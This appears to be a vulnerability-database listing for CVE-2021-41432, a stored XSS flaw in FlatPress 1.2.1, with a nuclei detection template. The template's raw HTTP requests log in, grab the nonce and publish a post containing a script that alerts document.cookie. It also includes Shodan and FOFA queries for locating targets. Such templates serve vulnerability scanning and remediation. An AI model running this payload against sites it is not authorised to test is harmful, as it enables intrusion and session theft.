Lucene search
K

FlatPress 1.2.1 - Stored Cross-Site Scripting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 149 Views

FlatPress 1.2.1 stored XSS allows arbitrary JavaScript execution, potential data theft, session hijacking, and website defacement. Upgrade to 1.2.2 or apply the provided patch for fix

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for SQL Injection in Grandcom Dynweb
15 Sep 202122:02
githubexploit
ATTACKERKB
CVE-2021-41432
23 Jun 202217:15
attackerkb
Circl
CVE-2021-41432
23 Jun 202220:29
circl
CNNVD
FlatPress 跨站脚本漏洞
23 Jun 202200:00
cnnvd
CNVD
FlatPress Cross-Site Scripting Vulnerability (CNVD-2022-58896)
27 Jun 202200:00
cnvd
CVE
CVE-2021-41432
22 Jun 202218:21
cve
Cvelist
CVE-2021-41432
22 Jun 202218:21
cvelist
EUVD
EUVD-2021-28459
3 Oct 202520:07
euvd
NVD
CVE-2021-41432
23 Jun 202217:15
nvd
OpenVAS
FlatPress <= 1.2.1 XSS Vulnerability (Sep 2021)
28 Jun 202200:00
openvas
Rows per page
id: CVE-2021-41432

info:
  name: FlatPress 1.2.1 - Stored Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website.
  remediation: |
    Upgrade to the latest version of FlatPress (1.2.2) or apply the provided patch to fix the XSS vulnerability.
  reference:
    - https://github.com/flatpressblog/flatpress/issues/88
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41432
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/martinkubecka/CVE-References
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2021-41432
    cwe-id: CWE-79
    epss-score: 0.01675
    epss-percentile: 0.74053
    cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: flatpress
    product: flatpress
    shodan-query:
      - http.html:"Flatpress"
      - http.html:"flatpress"
      - http.favicon.hash:-1189292869
    fofa-query:
      - body="flatpress"
      - icon_hash=-1189292869
  tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive,vuln

http:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp

        ------WebKitFormBoundarykGJmx9vKsePrMkVp
        Content-Disposition: form-data; name="user"

        {{username}}
        ------WebKitFormBoundarykGJmx9vKsePrMkVp
        Content-Disposition: form-data; name="pass"

        {{password}}
        ------WebKitFormBoundarykGJmx9vKsePrMkVp
        Content-Disposition: form-data; name="submit"

        Login
        ------WebKitFormBoundarykGJmx9vKsePrMkVp--
      - |
        GET /admin.php?p=entry&action=write HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /admin.php?p=entry&action=write HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd&timestamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish
      - |
        GET /index.php/2022/10 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains(body_4, '<p><script>alert(document.cookie)</script></p>')
          - contains(body_4, 'FlatPress')
          - contains(header_4, 'text/html')
          - status_code_4 == 200
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - name="_wpnonce" value="([0-9a-z]+)" />
        internal: true
        part: body
# digest: 490a0046304402204c76c6de3fb06d9ac10be67af6f4e81ab6bb5c7180fb74e1cbddf0ff03f74cb8022047c81bf98a71c58f758cbdce97783403af8a1d2e48c7d7c7234244e5bc003ec7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 23.5
CVSS 3.15.4
EPSS0.01675
149